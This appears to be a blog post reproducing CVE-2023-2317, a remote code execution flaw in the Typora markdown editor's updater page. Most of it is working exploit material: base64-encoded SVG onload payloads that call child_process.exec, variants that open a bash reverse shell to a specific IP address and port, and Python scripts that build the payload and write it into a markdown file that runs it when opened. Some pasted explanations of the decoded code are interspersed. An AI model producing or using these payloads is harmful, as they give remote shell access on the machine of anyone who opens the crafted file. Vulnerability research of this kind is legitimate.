Vulnerability reproduction: CVE-2023-2317 [Typora remote code execution vulnerability]
jerem1ah Lv4

https://www.cnblogs.com/bktown/p/17673366.html

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
Location of the vulnerable updater page inside the Typora install:
D:\01Solfware\01normal\11typora\Typora\resources\updater\updater.html
```html
<script type="text/javascript">
var curVersion = /[?&]curVersion=([^&]+)/.exec(window.location.search)[1];
var newVersion = /[?&]newVersion=([^&]+)/.exec(window.location.search)[1];
var releaseNoteLink = decodeURIComponent(/[?&]releaseNoteLink=([^&]+)/.exec(window.location.search)[1]);
var hideAutoUpdates = /[?&]hideAutoUpdates=([^&]+)/.exec(window.location.search)[1] == "true";
var labels = JSON.parse(decodeURIComponent(/[?&]labels=([^&]+)/.exec(window.location.search)[1]));

document.querySelector("#sum").innerText = labels[4] + " " + labels[5].replace("$1", newVersion).replace("$2", curVersion);
document.querySelectorAll("[data-label]").forEach(function(dom){
    dom.innerHTML = labels[dom.getAttribute("data-label") - 0]; // sink: a URL-controlled label is rendered as HTML
});
document.querySelector("#release-panel").src = releaseNoteLink;

var autoUpdateInput = document.querySelector("#preference-enable-auto-update")
autoUpdateInput.checked = !!isAutoUpdateEnabled;
autoUpdateInput.onchange = toggleAutoUpdate;
if(hideAutoUpdates) {
    document.querySelector("#preference-enable-auto-update-wrapper").style.display = "none";
    document.querySelector("#skip-this-version-btn-group").style.display = "none";
}
</script>
```
Injection test through the labels parameter (each label is assigned to innerHTML):
updater.html?curVersion=1&newVersion=2&releaseNoteLink=3&hideAutoUpdates=false&labels=["<input%20value=test>","22","33","44","55","66","77"]
URL-encoded labels value from the PoC:
[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]
After decodeURIComponent and JSON.parse:
["","<svg/onload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))></svg>","","","",""]
The base64 argument passed to atob decodes to:
reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

Platform lookup that selects the command to run:
({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)]
This tag contains suspicious malicious code; I do not recommend executing it. In detail:
<svg> - indicates that this is an SVG image tag
onload - is an event attribute; the code in this event runs as soon as the SVG image has finished loading
atob - is a function that decodes a base64-encoded string
The base64-encoded string - contains a piece of malicious JavaScript code; once decoded, it roughly does the following:
1. Imports the child_process module
2. Executes different system commands depending on the platform (Windows or Linux)
On Windows, runs calc (the calculator)
On Linux, runs gnome-calculator to open the calculator
3. This achieves the effect of executing system commands in the background when the SVG loads, without any user interaction
So this code has the typical characteristics of an XSS (cross-site scripting) attack; it may be some kind of prank or malicious code that performs unexpected actions. To be safe, do not open or execute this SVG image in untrusted pages. (edited)
navigator.platform.substr(0,5)]


This code snippet appears to detect the user's operating system platform and then execute different commands depending on the platform.
In detail:
navigator.platform: gets the operating system platform the browser is running on.
navigator.platform.substr(0,5): takes the first 5 characters of the platform string.
On Windows, platform has a value like "Win32" or "Win64".
Taking the first 5 characters gives "Win32".
On Linux, platform has a value like "Linux x86_64".
Taking the first 5 characters gives "Linux".
So this takes the first 5 characters of the platform string to decide whether the user's operating system is Windows or Linux.
The subsequent code then executes different commands depending on the platform result.
Executing different code depending on the user's operating system is common in malicious code and hacker attacks.
Such code needs to be treated with caution and reviewed carefully; do not execute it in untrusted contexts, in case it hides malicious behaviour.
Overall, this code may be harmless in itself, but in some contexts it could be put to bad use. (edited)
({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)] explain this code


This code executes different commands depending on the operating system. Specifically:
1. It defines an object whose keys are operating systems and whose values are the command strings to execute:
{
Win32: 'calc',
Linux: 'gnome-calculator -e "Typora RCE PoC"'
}
2. navigator.platform.substr(0,5) gets the first 5 characters of the operating system the browser runs on: "Win32" on Windows, "Linux" on Linux.
3. The command to execute is then looked up in the object using the operating-system key.
4. Finally, child_process.exec() is called to execute the retrieved command.
So the overall effect of the code is:
- On Windows, it launches the calculator program calc.
- On Linux, it opens the gnome-calculator calculator and executes a piece of code in it.
Judging by the hint "Typora RCE PoC", this appears to be proof-of-concept (PoC) code for some remote code execution (RCE) vulnerability in the Typora editor.
In summary, this code executes different local commands depending on the operating system; it looks like it has an improper purpose and should not be executed in untrusted contexts. (edited)
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

({Win32: 'calc', Linux: 'bash -c "bash -i >& /dev/tcp/39.105.51.11/7779 0>&1"'})[navigator.platform.substr(0,5)]

reqnode('child_process').exec(({Win32: 'calc', Linux: 'bash -c "bash -i >& /dev/tcp/39.105.51.11/7779 0>&1"'})[navigator.platform.substr(0,5)])

cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMzkuMTA1LjUxLjExLzc3NzkgMD4mMSInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk=

["","<svg/onload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMzkuMTA1LjUxLjExLzc3NzkgMD4mMSInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))></svg>","","","",""]


[%22%22,%22%3Csvg/onload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMzkuMTA1LjUxLjExLzc3NzkgMD4mMSInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))%3E%3C/svg%3E%22,%22%22,%22%22,%22%22,%22%22]


<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3Csvg/onload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMzkuMTA1LjUxLjExLzc3NzkgMD4mMSInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))%3E%3C/svg%3E%22,%22%22,%22%22,%22%22,%22%22]">

1. The difference between full encoding and partial encoding is how these characters are handled:
!*'();:@&=+$,/?%#[]
```python
import base64
from urllib.parse import quote

# command = '''gnome-calculator -e "Typora RCE PoC"'''
command = '''gnome-calculator -e "Typora RCE PoC";bash -c "bash -i >& /dev/tcp/39.105.51.11/7779 0>&1"'''
payload = '''reqnode('child_process').exec(({Win32: 'calc', Linux: \''''+command+'''\'})[navigator.platform.substr(0,5)])'''
payload_base64 = base64.b64encode(payload.encode()).decode()
argument_raw = f'''["","<svg/onload=top.eval(atob('{payload_base64}'))></svg>","","","",""]'''
# partial encoding: the characters in safe= are left as-is for updater.html's regex/decoder
argument_urlencode = quote(argument_raw, safe="!*'();:@&=+$,?%#[]")
final_exp = f'''<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels={argument_urlencode}">'''
print(final_exp)
```
```python
import base64
from urllib.parse import quote

# command = '''gnome-calculator -e "Typora RCE PoC"'''
command = '''gnome-calculator -e "Typora RCE PoC";'''
payload = '''reqnode('child_process').exec(({Win64: 'calc', Linux: \''''+command+'''\'})[navigator.platform.substr(0,5)])'''

# overrides the payload above: this variant only runs calc
payload = '''reqnode('child_process').exec('calc')'''
payload_base64 = base64.b64encode(payload.encode()).decode()
argument_raw = f'''["","<svg/onload=top.eval(atob('{payload_base64}'))></svg>","","","",""]'''
argument_urlencode = quote(argument_raw, safe="!*'();:@&=+$,?%#[]")
final_exp = f'''<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels={argument_urlencode}">'''
print(final_exp)

# write a test document containing the embed
final_exp = final_exp + '\n\n' + '```\ntest\n```'
with open('test_exp.md', 'w') as f:
    f.write(final_exp)
```
```python
import base64
from urllib.parse import quote

# command = '''gnome-calculator -e "Typora RCE PoC"'''
# command1 = '''calc''' # command that pops the calculator
command1 = '''mshta vbscript:msgbox("I am hack",64,"hackyou")(window.close)'''
# command2 = '''gnome-calculator -e "Typora RCE PoC";'''
# payload = '''reqnode('child_process').exec(({Win64: \''''+command1+'''\', Linux: \''''+command2+'''\'})[navigator.platform.substr(0,5)])'''
payload = '''reqnode('child_process').exec(\''''+command1+'''\')'''
payload_base64 = base64.b64encode(payload.encode()).decode()
argument_raw = f'''["","<svg/onload=top.eval(atob('{payload_base64}'))></svg>","","","",""]'''
argument_urlencode = quote(argument_raw, safe="!*'();:@&=+$,?%#[]")
final_exp = f'''<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels={argument_urlencode}">'''
print(final_exp)
final_exp = final_exp + '\n\n' + '```\ntest\n```\n'
with open('test_exp.md', 'w') as f:
    f.write(final_exp)
```